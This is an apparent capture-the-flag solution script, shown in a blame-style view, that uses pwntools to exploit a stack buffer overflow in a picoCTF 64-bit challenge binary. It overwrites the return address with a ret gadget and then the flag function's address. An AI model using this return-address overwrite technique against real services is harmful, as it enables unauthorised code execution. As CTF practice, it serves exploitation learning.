2024-09-03 21:30:47 +02:00
|
|
|
#!/usr/bin/env nix-shell
|
2024-09-03 22:31:36 +02:00
|
|
|
#!nix-shell -p python3 -i python3 (python3Packages.pwntools.override{debugger=pwndbg;})
|
2024-09-03 21:30:47 +02:00
|
|
|
|
|
|
|
from pwn import *
|
|
|
|
|
|
|
|
exe = ELF("./vuln")
|
|
|
|
|
|
|
|
context.binary = exe
|
|
|
|
|
2024-09-03 22:31:36 +02:00
|
|
|
ADDR, PORT, *_ = "saturn.picoctf.net 52789".split()
|
2024-09-03 21:30:47 +02:00
|
|
|
|
|
|
|
def conn():
|
|
|
|
if args.REMOTE:
|
|
|
|
r = remote(ADDR, PORT)
|
|
|
|
else:
|
|
|
|
r = process([exe.path])
|
|
|
|
|
|
|
|
return r
|
|
|
|
|
|
|
|
def main():
|
|
|
|
r = conn()
|
|
|
|
|
2024-09-03 22:31:36 +02:00
|
|
|
# gdb.attach(r, '''
|
|
|
|
# b *(vuln+29)
|
|
|
|
# c
|
|
|
|
# ''')
|
|
|
|
|
2024-09-03 21:30:47 +02:00
|
|
|
print(r.recvuntil(b"Welcome to 64-bit. Give me a string that gets you the flag:"))
|
|
|
|
offset = 72 # found with pwndbg
|
|
|
|
print(p64(exe.sym.flag))
|
2024-09-03 22:31:36 +02:00
|
|
|
# NOTE: extra ret gadget is needed to align the stack.
|
|
|
|
# Alternatively, we could ret to (exe.sym.flag + 5)
|
|
|
|
payload = b'A' * offset + p64(ROP(exe).ret.address) + p64(exe.sym.flag)
|
2024-09-03 21:30:47 +02:00
|
|
|
r.sendline(payload)
|
|
|
|
print(r.recvall())
|
|
|
|
r.close()
|
|
|
|
|
|
|
|
if __name__ == "__main__":
|
|
|
|
main()
|